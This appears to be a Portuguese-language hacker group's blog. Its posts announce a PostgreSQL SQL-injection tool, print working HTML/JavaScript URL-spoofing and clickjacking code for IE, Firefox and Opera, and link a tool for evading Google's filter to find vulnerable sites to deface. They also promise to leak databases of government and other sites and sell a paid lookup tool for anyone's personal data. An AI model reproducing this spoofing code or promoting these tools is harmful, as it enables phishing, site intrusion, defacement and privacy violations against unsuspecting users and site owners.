JKDRuy v.1.0 (PostgreSQL Injection)

Em virtude de não achar nenhuma ferramenta (GUI) que não explora vulnerabilidades em bancos de dados PostgreSQL (com excessão do Havij, porém a versão que explora tal falha é paga), resolvi fazer um programa para o Fail Shell (meu grupo) e, mais tarde, disponibilizar para vocês.

Para quem não sabe qual erro é retornado nessa falha, é semelhante ao seguinte:

Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near “\” at character…

Alguns prints dessa ferramenta:

Essa foi a novidade… Mais tarde editarei o post e colocarei o link para download da mesma!

Novidades

O Fail Shell publicará (a pedidos), através deste blog, banco de dados e falhas em sites relativamente “grandes”, do governo ou não.
Aguardem novidades!

Nós não temos nenhuma associação com o movimento dos Anonymous!

Obs.: O único twitter oficial do Fail Shell é @FailShellTeam, outros twitters, em nome de FIREH4CK3R ou do grupo Fail Shell, são falsos!

IE, FF e Opera URL Spoofing

É bem simples, mas não deixa de ser útil (principalmente para aqueles que estudam javascript).

IE e Mozila FF:
<html>
<body>
<div id="open"
onmouseover="document.l o c a t i o n='http://www.firescripts.wordpress.com;"
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
< script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
< /script>
<center>
<br>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>
</html>

Opera:
<html>
<title>ClickJacking</title>
<body bgcolor=black>
<a onMouseUp=window.open("http://www.google.com")
href=http://www.firescripts.wordpress.com/">
<font color=green>Testar Vulnerabilidade : ) </font></a></body>
</html>


Isso é só, pessoal ;D

Pedidos abertos

Pessoal, vou abrir esse post para vocês postarem aí os seus pedidos em forma de comentários. Podem pedir qualquer coisa sendo tools, scripts em PHP ou qualquer tutorial (programação, deface, etc).

Bom, aí é com vocês, estou esperando!
Abraços ;D

Google Burlate v.1.0 – Burla o filtro do google (FINALMENTE)!

Recentemente o google aplicou uma espécie de filtro para impedir que nós, famintos por defacement, encontremos mais sites vulneráveis para a exploração de falhas futuras com nossos simplórios scanners.

Bom, aí que eu entro na história: com isso, dezenas de pessoas começaram a pedir que criasse uma ferramenta que burlasse o tal filtro do google, pois ainda não foi criada uma ferramenta capaz de burlar isso. Pensando nisso, nessa madrugada qualquer, sem nada pra fazer, resolvi abrir o delphi 7 e criar essa ferramenta.

Aí está! Esse scan que acabei de criar para todos nós burla com facilidade o filtro do google. Baixem, é totalmente free.

http://www.4shared.com/file/nT2oYgON/Google_Burlate.html

Anti-Caloteiro v.1.0

Descrição
O Anti-Caloteiro v.1.0 é uma ferramenta privada semelhante à uma ferramenta qualquer de consulta ao crédito, porém com algumas opções a mais e sem nenhum limite.
O Anti-Caloteiro permite que saiba os dados de qualquer pessoa e é monitorado por senhas.
O programa permite atualizações periódicas para impedir possíveis travamentos e que sempre possa funcionar!
Para acessar o programa é necessário que compre uma senha, por paypal ou pagseguro.

Vantagens

1. Não há limitações de consulta;
2. Não é cobrado por consulta;
3. É permitido a atualização periódica, ou seja, não “cai”!

Preço
R$50,00 – Via PagSeguro ou Paypal
Deixe um comentário para entrar em contato caso esteja interessado!

Screenshot

YouTube

[OFF Topic] Rootando em Windows

Dessa vez fui bonzinho e não coloquei tarjas